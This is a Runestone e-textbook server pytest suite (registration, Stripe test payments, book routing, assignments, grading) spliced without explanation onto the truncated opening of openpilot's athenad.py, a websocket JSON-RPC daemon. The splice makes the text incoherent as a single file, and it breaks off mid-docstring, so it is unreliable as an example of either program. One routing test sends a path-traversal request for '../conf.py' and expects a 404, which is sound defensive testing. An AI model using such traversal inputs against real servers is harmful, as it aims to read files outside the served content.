# Test that the course name is correctly preserved across registrations if other fields are invalid.
def test_registration(test_client, runestone_db_tools):
    """Post a registration with mismatched passwords and verify the form
    reports its validation errors."""
    # Registration doesn't work unless we're logged out.
    test_client.logout()
    new_course_name = "a_course_name"
    runestone_db_tools.create_course(new_course_name)
    # Now, post the registration with a deliberately wrong password confirmation.
    reg_password = "password"
    form_fields = {
        "username": "username",
        "first_name": "first",
        "last_name": "last",
        # The e-mail address must be unique.
        "email": "e@mail.com",
        "password": reg_password,
        "password_two": reg_password + "oops",
        # Note that ``course_id`` is (on the form) actually a course name.
        "course_id": new_course_name,
        "accept_tcp": "on",
        "donate": "0",
        "_next": "/runestone/default/index",
        "_formname": "register",
    }
    test_client.validate(
        "default/user/register",
        "Please fix the following errors in your registration",
        data=form_fields,
    )
# Check that the pricing system works correctly.
def test_pricing(runestone_db_tools, runestone_env):
    """Check ``_course_price``: negative/None prices clamp to 0, and a child
    course's price overrides the base course's price when set."""
    # Check the pricing.
    default_controller = web2py_controller_import(runestone_env, "default")
    db = runestone_db_tools.db
    base_course = runestone_db_tools.create_course()
    child_course = runestone_db_tools.create_course(
        "test_child_course", base_course=base_course.course_name
    )
    # First, test on a base course.
    for expected_price, actual_price in [(0, None), (0, -100), (0, 0), (15, 15)]:
        db(db.courses.id == base_course.course_id).update(student_price=actual_price)
        assert default_controller._course_price(base_course.course_id) == expected_price
    # Test in a child course as well. Create a matrix of all base course prices by all child course prices.
    for expected_price, actual_base_price, actual_child_price in [
        (0, None, None),
        (0, None, 0),
        (0, None, -1),
        (2, None, 2),
        (0, 0, None),
        (0, 0, 0),
        (0, 0, -1),
        (2, 0, 2),
        (0, -2, None),
        (0, -2, 0),
        (0, -2, -1),
        (2, -2, 2),
        (3, 3, None),
        (0, 3, 0),
        (0, 3, -1),
        (2, 3, 2),
    ]:
        db(db.courses.id == base_course.course_id).update(
            student_price=actual_base_price
        )
        db(db.courses.id == child_course.course_id).update(
            student_price=actual_child_price
        )
        assert (
            default_controller._course_price(child_course.course_id) == expected_price
        )
# Check that setting the price causes redirects to the correct location (payment vs. donation) when registering for a course or adding a new course.
def test_price_free(runestone_db_tools, test_user):
    """A free course (student_price=0) must enroll the student in the
    ``user_courses`` table immediately, both at registration time and when
    adding a second course via the profile page."""
    db = runestone_db_tools.db

    def enrolled(course_id, user_id):
        # The ``user_courses`` row linking this user to this course, or None.
        # (Extracted because the same query appeared twice, inline.)
        return (
            db(
                (db.user_courses.course_id == course_id)
                & (db.user_courses.user_id == user_id)
            )
            .select()
            .first()
        )

    course_1 = runestone_db_tools.create_course(student_price=0)
    course_2 = runestone_db_tools.create_course("test_course_2", student_price=0)
    # Check registering for a free course.
    test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=True)
    # Verify the user was added to the ``user_courses`` table.
    assert enrolled(test_user_1.course.course_id, test_user_1.user_id)
    # Check adding a free course.
    test_user_1.update_profile(course_name=course_2.course_name, is_free=True)
    # Same as above.
    assert enrolled(course_2.course_id, test_user_1.user_id)
def test_price_paid(runestone_db_tools, test_user):
    """A paid course must NOT enroll the student in ``user_courses`` until
    payment is made; refresh, logout/login, and adding another paid course
    must not grant access."""
    db = runestone_db_tools.db

    def enrolled(course_id, user_id):
        # The ``user_courses`` row linking this user to this course, or None.
        # (Extracted because the same query appeared twice, inline.)
        return (
            db(
                (db.user_courses.course_id == course_id)
                & (db.user_courses.user_id == user_id)
            )
            .select()
            .first()
        )

    # Check registering for a paid course.
    course_1 = runestone_db_tools.create_course(student_price=1)
    course_2 = runestone_db_tools.create_course("test_course_2", student_price=1)
    test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=False)
    # Until payment is provided, the user shouldn't be added to the ``user_courses`` table. Ensure that refresh, login/logout, profile changes, adding another class, etc. don't allow access.
    test_user_1.test_client.logout()
    test_user_1.login()
    test_user_1.test_client.validate("default/index")
    # Check adding a paid course.
    test_user_1.update_profile(course_name=course_2.course_name, is_free=False)
    # Verify no access without payment.
    assert not enrolled(course_1.course_id, test_user_1.user_id)
    assert not enrolled(course_2.course_id, test_user_1.user_id)
# Check that payments are handled correctly.
def test_payments(runestone_controller, runestone_db_tools, test_user):
    """Verify Stripe payment handling: failing test tokens don't enroll the
    student, ``tok_visa`` does, and the resulting charge is recorded."""
    if not runestone_controller.settings.STRIPE_SECRET_KEY:
        pytest.skip("No Stripe keys provided.")
    db = runestone_db_tools.db
    course_1 = runestone_db_tools.create_course(student_price=100)
    test_user_1 = test_user("test_user_1", "password_1", course_1, is_free=False)
    def did_payment():
        # True if the user is now linked to the course in ``user_courses``,
        # i.e. the payment went through.
        return (
            db(
                (db.user_courses.course_id == course_1.course_id)
                & (db.user_courses.user_id == test_user_1.user_id)
            )
            .select()
            .first()
        )
    # Test some failing tokens.
    assert not did_payment()
    for token in ["tok_chargeCustomerFail", "tok_chargeDeclined"]:
        test_user_1.make_payment(token)
        assert not did_payment()
    test_user_1.make_payment("tok_visa")
    assert did_payment()
    # Check that the payment record is correct.
    payment = (
        db(
            (db.user_courses.user_id == test_user_1.user_id)
            & (db.user_courses.course_id == course_1.course_id)
            & (db.user_courses.id == db.payments.user_courses_id)
        )
        .select(db.payments.charge_id)
        .first()
    )
    assert payment.charge_id
# Test the LP endpoint.
@pytest.mark.skipif(six.PY2, reason="Requires Python 3.")
def test_lp(test_user_1):
    """Exercise the ``lp_build`` hsblog event: missing parameters, an invalid
    ``div_id``, and a passing build graded at 100."""
    test_user_1.login()
    # Check that omitting parameters produces an error.
    ret = test_user_1.hsblog(event="lp_build")
    assert "No feedback provided" in ret["errors"][0]
    # Check that database entries are validated.
    ret = test_user_1.hsblog(
        event="lp_build",
        # This div_id is too long. Everything else is OK.
        div_id="X" * 1000,
        course=test_user_1.course.course_name,
        builder="unsafe-python",
        answer=json.dumps({"code_snippets": ["def one(): return 1"]}),
    )
    assert "div_id" in ret["errors"][0]
    # Check a passing case
    def assert_passing():
        # Submit a correct snippet; the build must succeed with a 100% grade.
        ret = test_user_1.hsblog(
            event="lp_build",
            div_id="lp_demo_1",
            course=test_user_1.course.course_name,
            builder="unsafe-python",
            answer=json.dumps({"code_snippets": ["def one(): return 1"]}),
        )
        assert "errors" not in ret
        assert ret["correct"] == 100
    assert_passing()
    # Send lots of jobs to test out the queue. Skip this for now -- not all the useinfo entries get deleted, which causes ``test_getNumOnline`` to fail.
    if False:
        threads = [Thread(target=assert_passing) for x in range(5)]
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
# Test dynamic book routing.
def test_dynamic_book_routing_1(test_client, test_user_1):
    """Run the shared dynamic-routing checks while logged in, then verify that
    an instructor can view the draft book."""
    test_user_1.login()
    dbr_tester(test_client, test_user_1, True)
    # Drafts are accessible only to instructors.
    test_user_1.make_instructor()
    test_user_1.update_profile(course_name=test_user_1.course.course_name)
    draft_url = "books/draft/{}/index.html".format(test_user_1.course.base_course)
    test_client.validate(draft_url, "The red car drove away.")
# Test the no-login case.
def test_dynamic_book_routing_2(test_client, test_user_1):
    """Run the shared dynamic-routing checks for a book that permits anonymous
    access (``login_required`` cleared on the base course)."""
    test_client.logout()
    # First, mark the base course as not requiring a login.
    db = test_user_1.runestone_db_tools.db
    base_course_name = test_user_1.course.base_course
    db(db.courses.course_name == base_course_name).update(login_required=False)
    db.commit()
    dbr_tester(test_client, test_user_1, False)
def dbr_tester(test_client, test_user_1, is_logged_in):
    """Shared dynamic-book-routing checks, run both logged in and anonymously.

    Covers error cases (bad course/page/directory/path traversal), a valid
    page with the expected eBookConfig values, draft protection, base-course
    routing, and static file serving.
    """
    # Test error cases.
    validate = test_client.validate
    base_course = test_user_1.course.base_course
    # A non-existent course.
    if is_logged_in:
        validate("books/published/xxx", "Course Selection")
    else:
        validate("books/published/xxx", expected_status=404)
    # A non-existent page.
    validate("books/published/{}/xxx".format(base_course), expected_status=404)
    # A directory.
    validate(
        "books/published/{}/test_chapter_1".format(base_course), expected_status=404
    )
    # Attempt to access files outside a course.
    validate("books/published/{}/../conf.py".format(base_course), expected_status=404)
    # Attempt to access a course we're not registered for. TODO: Need to create another base course for this to work.
    ##if is_logged_in:
    ## #validate('books/published/{}/index.html'.format(base_course), [
    ## 'Sorry you are not registered for this course.'
    ## ])
    # A valid page. Check the book config as well.
    validate(
        "books/published/{}/index.html".format(base_course),
        [
            "The red car drove away.",
            "eBookConfig.course = '{}';".format(
                test_user_1.course.course_name if is_logged_in else base_course
            ),
            "eBookConfig.basecourse = '{}';".format(base_course),
        ],
    )
    # Drafts shouldn't be accessible by students.
    validate(
        "books/draft/{}/index.html".format(base_course),
        "Insufficient privileges" if is_logged_in else "Username",
    )
    # Check routing in a base course.
    if is_logged_in:
        test_user_1.update_profile(
            course_name=test_user_1.course.base_course, is_free=True
        )
        validate(
            "books/published/{}/index.html".format(base_course),
            [
                "The red car drove away.",
                "eBookConfig.course = '{}';".format(base_course),
                "eBookConfig.basecourse = '{}';".format(base_course),
            ],
        )
    # Test static content.
    validate(
        "books/published/{}/_static/runestone-custom-sphinx-bootstrap.css".format(
            base_course
        ),
        "background-color: #fafafa;",
    )
def test_assignments(test_client, runestone_db_tools, test_user):
    """Exercise the instructor assignment endpoints: create, duplicate-name
    detection, rename, and removal (including a nonexistent id)."""
    course_3 = runestone_db_tools.create_course("test_course_3")
    test_instructor_1 = test_user("test_instructor_1", "password_1", course_3)
    test_instructor_1.make_instructor()
    test_instructor_1.login()
    db = runestone_db_tools.db
    name_1 = "test_assignment_1"
    name_2 = "test_assignment_2"
    name_3 = "test_assignment_3"
    # Create an assignment -- using createAssignment
    test_client.post("admin/createAssignment", data=dict(name=name_1))
    assign1 = (
        db(
            (db.assignments.name == name_1)
            & (db.assignments.course == test_instructor_1.course.course_id)
        )
        .select()
        .first()
    )
    assert assign1
    # Make sure you can't create two assignments with the same name
    test_client.post("admin/createAssignment", data=dict(name=name_1))
    assert "EXISTS" in test_client.text
    # Rename assignment
    test_client.post("admin/createAssignment", data=dict(name=name_2))
    assign2 = (
        db(
            (db.assignments.name == name_2)
            & (db.assignments.course == test_instructor_1.course.course_id)
        )
        .select()
        .first()
    )
    assert assign2
    test_client.post(
        "admin/renameAssignment", data=dict(name=name_3, original=assign2.id)
    )
    assert db(db.assignments.name == name_3).select().first()
    assert not db(db.assignments.name == name_2).select().first()
    # Make sure you can't rename an assignment to an already used assignment
    test_client.post(
        "admin/renameAssignment", data=dict(name=name_3, original=assign1.id)
    )
    assert "EXISTS" in test_client.text
    # Delete an assignment -- using removeassignment
    test_client.post("admin/removeassign", data=dict(assignid=assign1.id))
    assert not db(db.assignments.name == name_1).select().first()
    test_client.post("admin/removeassign", data=dict(assignid=assign2.id))
    assert not db(db.assignments.name == name_3).select().first()
    # Removing a nonexistent assignment id must report an error.
    test_client.post("admin/removeassign", data=dict(assignid=9999999))
    assert "Error" in test_client.text
def test_instructor_practice_admin(test_client, runestone_db_tools, test_user):
    """Exercise the instructor practice-tool admin pages: save per-course
    practice settings, then add a subchapter to a student's flashcards."""
    course_4 = runestone_db_tools.create_course("test_course_1")
    test_student_1 = test_user("test_student_1", "password_1", course_4)
    test_student_1.logout()
    test_instructor_1 = test_user("test_instructor_1", "password_1", course_4)
    test_instructor_1.make_instructor()
    test_instructor_1.login()
    db = runestone_db_tools.db
    course_start_date = datetime.datetime.strptime(
        course_4.term_start_date, "%Y-%m-%d"
    ).date()
    start_date = course_start_date + datetime.timedelta(days=13)
    end_date = datetime.datetime.today().date() + datetime.timedelta(days=30)
    max_practice_days = 40
    max_practice_questions = 400
    day_points = 1
    question_points = 0.2
    questions_to_complete_day = 5
    graded = 0
    # Test the practice tool settings for the course.
    flashcard_creation_method = 2
    test_client.post(
        "admin/practice",
        data={
            "StartDate": start_date,
            "EndDate": end_date,
            "graded": graded,
            "maxPracticeDays": max_practice_days,
            "maxPracticeQuestions": max_practice_questions,
            "pointsPerDay": day_points,
            "pointsPerQuestion": question_points,
            "questionsPerDay": questions_to_complete_day,
            "flashcardsCreationType": 2,
            "question_points": question_points,
        },
    )
    practice_settings_1 = (
        db(
            (db.course_practice.auth_user_id == test_instructor_1.user_id)
            & (db.course_practice.course_name == course_4.course_name)
            & (db.course_practice.start_date == start_date)
            & (db.course_practice.end_date == end_date)
            & (
                db.course_practice.flashcard_creation_method
                == flashcard_creation_method
            )
            & (db.course_practice.graded == graded)
        )
        .select()
        .first()
    )
    assert practice_settings_1
    # The stored limits depend on whether spacing (day-based) mode is active.
    if practice_settings_1.spacing == 1:
        assert practice_settings_1.max_practice_days == max_practice_days
        assert practice_settings_1.day_points == day_points
        assert (
            practice_settings_1.questions_to_complete_day == questions_to_complete_day
        )
    else:
        assert practice_settings_1.max_practice_questions == max_practice_questions
        assert practice_settings_1.question_points == question_points
    # Test instructor adding a subchapter to the practice tool for students.
    # I need to call set_tz_offset to set timezoneoffset in the session.
    test_client.post("ajax/set_tz_offset", data={"timezoneoffset": 0})
    # The reason I'm manually stringifying the list value is that test_client.post does something strange with compound objects instead of passing them to json.dumps.
    test_client.post(
        "admin/add_practice_items",
        data={"data": '["1. Test chapter 1/1.2 Subchapter B"]'},
    )
    practice_settings_1 = (
        db(
            (db.user_topic_practice.user_id == test_student_1.user_id)
            & (db.user_topic_practice.course_name == course_4.course_name)
            & (db.user_topic_practice.chapter_label == "test_chapter_1")
            & (db.user_topic_practice.sub_chapter_label == "subchapter_b")
        )
        .select()
        .first()
    )
    assert practice_settings_1
def test_deleteaccount(test_client, runestone_db_tools, test_user):
    """Create a user, record an answer, delete the account, then verify every
    trace of the user is removed from the logging and answer tables."""
    course_3 = runestone_db_tools.create_course("test_course_3")
    the_user = test_user("user_to_delete", "password_1", course_3)
    the_user.login()
    validate = the_user.test_client.validate
    # Produce some activity so there is data to scrub.
    the_user.hsblog(
        event="mChoice",
        act="answer:1:correct",
        answer="1",
        correct="T",
        div_id="subc_b_1",
        course="test_course_3",
    )
    validate("default/delete", "About Runestone", data=dict(deleteaccount="checked"))
    db = runestone_db_tools.db
    # Removed a leftover debug ``select``/``print(res)`` pair here -- its result
    # was never asserted.
    # Related records are scrubbed asynchronously; give the server time to finish.
    time.sleep(2)
    assert not db(db.useinfo.sid == "user_to_delete").select().first()
    assert not db(db.code.sid == "user_to_delete").select().first()
    for t in [
        "clickablearea",
        "codelens",
        "dragndrop",
        "fitb",
        "lp",
        "mchoice",
        "parsons",
        "shortanswer",
    ]:
        assert (
            not db(db["{}_answers".format(t)].sid == "user_to_delete").select().first()
        )
# Test the grades report.
# When this test fails, it is very difficult to figure out why.
# The data structures being compared are very large, which makes it hard
# to pin down what is failing. In addition, there seems to be a dictionary
# in here somewhere whose ordering shifts around. I think it is currently
# broken because more components now return a percent correct value.
@pytest.mark.skip(reason="TODO: This test is unpredictable and needs to be updated.")
def test_grades_1(runestone_db_tools, test_user, tmp_path):
    """End-to-end check of ``assignments/grades_report``: create users and
    answers, build and autograde an assignment, then compare the report
    against a hand-built expected structure."""
    # Create test users.
    course = runestone_db_tools.create_course()
    course_name = course.course_name
    # **Create test data**
    # ======================
    # Create test users.
    test_user_array = [
        test_user(
            "test_user_{}".format(index), "x", course, last_name="user_{}".format(index)
        )
        for index in range(4)
    ]
    def assert_passing(index, *args, **kwargs):
        # An hsblog call for ``test_user_array[index]`` that must not error.
        res = test_user_array[index].hsblog(*args, **kwargs)
        assert "errors" not in res
    # Prepare common arguments for each question type.
    shortanswer_kwargs = dict(
        event="shortanswer", div_id="test_short_answer_1", course=course_name
    )
    fitb_kwargs = dict(event="fillb", div_id="test_fitb_1", course=course_name)
    mchoice_kwargs = dict(event="mChoice", div_id="test_mchoice_1", course=course_name)
    lp_kwargs = dict(
        event="lp_build",
        div_id="lp_demo_1",
        course=course_name,
        builder="unsafe-python",
    )
    unittest_kwargs = dict(event="unittest", div_id="units2", course=course_name)
    # *User 0*: no data supplied
    ##----------------------------
    # *User 1*: correct answers
    ##---------------------------
    # It doesn't matter which user logs out, since all three users share the same client.
    logout = test_user_array[2].test_client.logout
    logout()
    test_user_array[1].login()
    assert_passing(1, act=test_user_array[1].username, **shortanswer_kwargs)
    assert_passing(1, answer=json.dumps(["red", "away"]), **fitb_kwargs)
    assert_passing(1, answer="0", correct="T", **mchoice_kwargs)
    assert_passing(
        1, answer=json.dumps({"code_snippets": ["def one(): return 1"]}), **lp_kwargs
    )
    assert_passing(1, act="percent:100:passed:2:failed:0", **unittest_kwargs)
    # *User 2*: incorrect answers
    ##----------------------------
    logout()
    test_user_array[2].login()
    # Add three shortanswer answers, to make sure the number of attempts is correctly recorded.
    for x in range(3):
        assert_passing(2, act=test_user_array[2].username, **shortanswer_kwargs)
    assert_passing(2, answer=json.dumps(["xxx", "xxxx"]), **fitb_kwargs)
    assert_passing(2, answer="1", correct="F", **mchoice_kwargs)
    assert_passing(
        2, answer=json.dumps({"code_snippets": ["def one(): return 2"]}), **lp_kwargs
    )
    assert_passing(2, act="percent:50:passed:1:failed:1", **unittest_kwargs)
    # *User 3*: no data supplied, and no longer in course.
    ##----------------------------------------------------
    # Wait until the autograder is run to remove the student, so they will have a grade but not have any submissions.
    # **Test the grades_report endpoint**
    ##====================================
    tu = test_user_array[2]
    def grades_report(assignment, *args, **kwargs):
        # Request an assignment-type grades report; returns the response body.
        return tu.test_client.validate(
            "assignments/grades_report",
            *args,
            data=dict(chap_or_assign=assignment, report_type="assignment"),
            **kwargs
        )
    # Test not being an instructor.
    grades_report("", "About Runestone")
    tu.make_instructor()
    # Test an invalid assignment.
    grades_report("", "Unknown assignment")
    # Create an assignment.
    assignment_name = "test_assignment"
    assignment_id = json.loads(
        tu.test_client.validate(
            "admin/createAssignment", data={"name": assignment_name}
        )
    )[assignment_name]
    assignment_kwargs = dict(
        assignment=assignment_id, autograde="pct_correct", which_to_grade="first_answer"
    )
    # Add questions to the assignment.
    def add_to_assignment(question_kwargs, points):
        # Attach one question to the assignment with the given point value.
        assert (
            tu.test_client.validate(
                "admin/add__or_update_assignment_question",
                data=dict(
                    question=question_kwargs["div_id"],
                    points=points,
                    **assignment_kwargs
                ),
            )
            != json.dumps("Error")
        )
    # Determine the order of the questions and the _`point values`.
    add_to_assignment(shortanswer_kwargs, 0)
    add_to_assignment(fitb_kwargs, 1)
    add_to_assignment(mchoice_kwargs, 2)
    add_to_assignment(lp_kwargs, 3)
    add_to_assignment(unittest_kwargs, 4)
    # Autograde the assignment.
    assignment_kwargs = dict(data={"assignment": assignment_name})
    assert json.loads(
        tu.test_client.validate("assignments/autograde", **assignment_kwargs)
    )["message"].startswith("autograded")
    assert json.loads(
        tu.test_client.validate("assignments/calculate_totals", **assignment_kwargs)
    )["success"]
    # Remove test user 3 from the course. They can't be removed from the current course, so create a new one then add this user to it.
    logout()
    tu = test_user_array[3]
    tu.login()
    new_course = runestone_db_tools.create_course("random_course_name")
    tu.update_profile(course_name=new_course.course_name, is_free=True)
    tu.coursechooser(new_course.course_name)
    tu.removecourse(course_name)
    # **Test this assignment.**
    # ===========================
    # Log back in as the instructor.
    logout()
    tu = test_user_array[2]
    tu.login()
    # Now, we can get the report.
    grades = json.loads(grades_report(assignment_name))
    # Define a regex string comparison.
    class RegexEquals:
        def __init__(self, regex):
            self.regex = re.compile(regex)
        def __eq__(self, other):
            return bool(re.search(self.regex, other))
    # See if a date in ISO format followed by a "Z" is close to the current time.
    class AlmostNow:
        def __eq__(self, other):
            # Parse the date string. Assume it ends with a Z and discard this.
            assert other and other[-1] == "Z"
            # Per the `docs <https://docs.python.org/3/library/datetime.html#datetime.date.fromisoformat>`_, this function requires Python 3.7+.
            if sys.version_info >= (3, 7):
                dt = datetime.datetime.fromisoformat(other[:-1])
                return datetime.datetime.utcnow() - dt < datetime.timedelta(minutes=1)
            else:
                # Hope for the best on older Python.
                return True
    # These are based on the data input for each user earlier in this test.
    expected_grades = {
        "colHeaders": [
            "userid",
            "Family name",
            "Given name",
            "e-mail",
            "avg grade (%)",
            "1",
            "1",
            "1",
            "2.1",
            "2",
        ],
        "data": [
            [
                "div_id",
                "",
                "",
                "",
                "",
                "test_short_answer_1",
                "test_fitb_1",
                "test_mchoice_1",
                "lp_demo_1",
                "units2",
            ],
            [
                "location",
                "",
                "",
                "",
                "",
                "index - ",
                "index - ",
                "index - ",
                "lp_demo.py - ",
                "index - ",
            ],
            [
                "type",
                "",
                "",
                "",
                "",
                "shortanswer",
                "fillintheblank",
                "mchoice",
                "lp_build",
                "activecode",
            ],
            # See the `point values`_ assigned earlier.
            ["points", "", "", "", "", 0, 1, 2, 3, 4],
            ["avg grade (%)", "", "", "", ""],
            ["avg attempts", "", "", "", ""],
            ["test_user_0", "user_0", "test", "test_user_0@foo.com", 0.0],
            ["test_user_1", "user_1", "test", "test_user_1@foo.com", 1.0],
            ["test_user_2", "user_2", "test", "test_user_2@foo.com", 0.2],
            ["test_user_3", "user_3", "test", "test_user_3@foo.com", 0.0],
        ],
        # Correct since the first 3 questions are all on the index page.
        "mergeCells": [{"col": 5, "colspan": 3, "row": 1, "rowspan": 1}],
        "orig_data": [
            # User 0: not submitted.
            [
                # The format is:
                # ``[timestamp, score, answer, correct, num_attempts]``.
                [None, 0.0, None, None, None], # shortanswer
                [None, 0.0, None, None, None], # fillintheblank
                [None, 0.0, None, None, None], # mchoice
                [None, 0.0, {}, None, None], # lp_build
                [None, 0.0, "", None, None], # activecode
            ],
            # User 1: all correct.
            [
                [AlmostNow(), 0.0, "test_user_1", None, 1],
                [AlmostNow(), 1.0, ["red", "away"], True, 1],
                [AlmostNow(), 2.0, [0], True, 1],
                [
                    AlmostNow(),
                    3.0,
                    {"code_snippets": ["def one(): return 1"], "resultString": ""},
                    100.0,
                    1,
                ],
                [AlmostNow(), 4.0, "percent:100:passed:2:failed:0", True, 1],
            ],
            # User 2: all incorrect.
            [
                [AlmostNow(), 0.0, "test_user_2", None, 3],
                [AlmostNow(), 0.0, ["xxx", "xxxx"], False, 1],
                [AlmostNow(), 0.0, [1], False, 1],
                [
                    AlmostNow(),
                    0.0,
                    {
                        "code_snippets": ["def one(): return 2"],
                        "resultString": RegexEquals(
                            "Traceback \\(most recent call last\\):\n"
                            " File "
                            # Use a regex for the file's path.
                            '"\\S*lp_demo-test.py", '
                            "line 6, in <module>\n"
                            " assert one\\(\\) == 1\n"
                            "AssertionError"
                        ),
                    },
                    0.0,
                    1,
                ],
                [AlmostNow(), 2.0, "percent:50:passed:1:failed:1", False, 1],
            ],
            # User 3: not submitted.
            [
                # The format is:
                [None, 0.0, None, None, None],
                [None, 0.0, None, None, None],
                [None, 0.0, None, None, None],
                [None, 0.0, {}, None, None],
                [None, 0.0, "", None, None],
            ],
        ],
    }
    # Note: on test failure, pytest will report as incorrect all the ``AlmostNow()`` and ``RegexEquals`` items, even though they may have actually compared as equal.
    # assert grades == expected_grades
    # lets break this up a bit.
    for k in expected_grades:
        assert grades[k] == expected_grades[k]
    logout()
    # Test with no login.
    grades_report("", "About Runestone")
def test_pageprogress(test_client, runestone_db_tools, test_user_1):
    """After answering subc_b_1, the subchapter page's progress counts should
    show one interaction for it and zero for the untouched questions."""
    test_user_1.login()
    answer_event = dict(
        event="mChoice",
        act="answer:1:correct",
        answer="1",
        correct="T",
        div_id="subc_b_1",
        course=test_user_1.course.course_name,
    )
    test_user_1.hsblog(**answer_event)
    # Since the user has answered the question the count for subc_b_1 should be 1.
    # The client-side totals require javascript; those are covered by the
    # Selenium tests on the components side.
    subchapter_url = "books/published/{}/test_chapter_1/subchapter_b.html".format(
        test_user_1.course.base_course
    )
    test_user_1.test_client.validate(subchapter_url, '"subc_b_1": 1')
    page = test_user_1.test_client.text
    assert '"LearningZone_poll": 0' in page
    assert '"subc_b_fitb": 0' in page
def test_lockdown(test_client, test_user_1):
    """The regular (non-lockdown) book page should include all of the standard
    navigation, profile, and social chrome."""
    test_user_1.login()
    base_course = test_user_1.course.base_course
    page = test_client.validate("books/published/{}/index.html".format(base_course))
    expected_fragments = (
        '/default/user/login"> </a>',
        "Runestone in social media:",
        ">Change Course</a></li>",
        'id="profilelink">Edit',
        '<ul class="dropdown-menu user-menu">',
        "<span id='numuserspan'></span><span class='loggedinuser'></span>",
        '<script async src="https://hypothes.is/embed.js"></script>',
    )
    for fragment in expected_fragments:
        assert fragment in page
# Test server-side logic in FITB questions.
def test_fitb(test_user_1, selenium_user):
    """Drive a numeric fill-in-the-blank question in the browser and check the
    server-graded feedback, including whitespace tolerance."""
    selenium_user_1 = selenium_user(test_user_1)
    selenium_user_1.login()
    # Browse to the page with a fitb question.
    d = selenium_user_1.driver
    d.rs_get("books/published/test_course_1/index.html")
    id = "test_fitb_numeric"
    fitb = d.find_element_by_id(id)
    blank = fitb.find_elements_by_tag_name("input")[0]
    check_me_button = fitb.find_element_by_tag_name("button")
    feedback_id = id + "_feedback"
    wait = WebDriverWait(d, 10)
    # Enter a value and check it
    def check_val(val, feedback_str="Correct"):
        # Erase any previous answer text, type ``val``, submit, and wait for
        # ``feedback_str`` to appear in the feedback element.
        blank.clear()
        blank.send_keys(val)
        check_me_button.click()
        wait.until(EC.text_to_be_present_in_element((By.ID, feedback_id), feedback_str))
    check_val("10")
    # Check this next, since it expects a different answer -- two correct answers in a row are harder to distinguish (has the new text been updated yet or not?).
    check_val("11", "Close")
    # Ensure spaces don't prevent correct numeric parsing.
    check_val(" 10 ")
    selenium_user_1.logout()
|
athenad.py
|
#!/usr/bin/env python3
import base64
import bz2
import hashlib
import io
import json
import os
import queue
import random
import select
import socket
import subprocess
import sys
import tempfile
import threading
import time
from collections import namedtuple
from datetime import datetime
from functools import partial
from typing import Any, Dict
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import (ABNF, WebSocketException, WebSocketTimeoutException,
create_connection)
import cereal.messaging as messaging
from cereal import log
from cereal.services import service_list
from common.api import Api
from common.basedir import PERSIST
from common.file_helpers import CallbackReader
from common.params import Params
from common.realtime import sec_since_boot, set_core_affinity
from system.hardware import HARDWARE, PC, AGNOS
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.statsd import STATS_DIR
from system.swaglog import SWAGLOG_DIR, cloudlog
from system.version import get_commit, get_origin, get_short_branch, get_version
# Connection and upload tuning.
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = {8022}  # NOTE(review): presumably ports allowed for startLocalProxy -- confirm

LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
MAX_AGE = 31 * 24 * 3600 # seconds
WS_FRAME_SIZE = 4096

NetworkType = log.DeviceState.NetworkType

dispatcher["echo"] = lambda s: s
# Queues shared between the websocket threads and the worker threads.
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
low_priority_send_queue: Any = queue.Queue()
log_recv_queue: Any = queue.Queue()
cancelled_uploads: Any = set()

# A queued/in-flight upload; the trailing fields default via ``defaults``.
UploadItem = namedtuple('UploadItem', ['path', 'url', 'headers', 'created_at', 'id', 'retry_count', 'current', 'progress', 'allow_cellular'], defaults=(0, False, 0, False))

# Maps upload-worker thread id -> the item it is currently handling (or None).
cur_upload_items: Dict[int, Any] = {}
def strip_bz2_extension(fn):
  """Return ``fn`` with a trailing '.bz2' removed, or unchanged if absent."""
  return fn[:-len('.bz2')] if fn.endswith('.bz2') else fn
class AbortTransferException(Exception):
  """Raised by the upload progress callback to abort an in-flight transfer
  (e.g. when the connection becomes metered mid-upload)."""
  pass
class UploadQueueCache():
  """Persists the upload queue in the ``AthenadUploadQueue`` param so queued
  uploads survive an athenad restart."""
  params = Params()
  @staticmethod
  def initialize(upload_queue):
    """Repopulate ``upload_queue`` from the cached JSON, if any."""
    try:
      upload_queue_json = UploadQueueCache.params.get("AthenadUploadQueue")
      if upload_queue_json is not None:
        for item in json.loads(upload_queue_json):
          upload_queue.put(UploadItem(**item))
    except Exception:
      cloudlog.exception("athena.UploadQueueCache.initialize.exception")
  @staticmethod
  def cache(upload_queue):
    """Write the current queue contents (minus cancelled items) back to the param."""
    try:
      items = [i._asdict() for i in upload_queue.queue if i.id not in cancelled_uploads]
      UploadQueueCache.params.put("AthenadUploadQueue", json.dumps(items))
    except Exception:
      cloudlog.exception("athena.UploadQueueCache.cache.exception")
def handle_long_poll(ws):
  """Run all athena worker threads over the open websocket ``ws``.

  Spawns the recv/send/upload/log/stat threads plus HANDLER_THREADS JSON-RPC
  workers, then blocks until ``end_event`` is set (by a thread or by
  KeyboardInterrupt/SystemExit), joining every thread before returning.
  """
  end_event = threading.Event()
  threads = [
    threading.Thread(target=ws_recv, args=(ws, end_event), name='ws_recv'),
    threading.Thread(target=ws_send, args=(ws, end_event), name='ws_send'),
    threading.Thread(target=upload_handler, args=(end_event,), name='upload_handler'),
    threading.Thread(target=log_handler, args=(end_event,), name='log_handler'),
    threading.Thread(target=stat_handler, args=(end_event,), name='stat_handler'),
  ] + [
    threading.Thread(target=jsonrpc_handler, args=(end_event,), name=f'worker_{x}')
    for x in range(HANDLER_THREADS)
  ]
  for thread in threads:
    thread.start()
  try:
    while not end_event.is_set():
      time.sleep(0.1)
  except (KeyboardInterrupt, SystemExit):
    end_event.set()
    raise
  finally:
    for thread in threads:
      cloudlog.debug(f"athena.joining {thread.name}")
      thread.join()
def jsonrpc_handler(end_event):
  """Worker loop: pull messages from ``recv_queue`` and dispatch them.

  Requests (containing "method") are run through the JSON-RPC dispatcher and
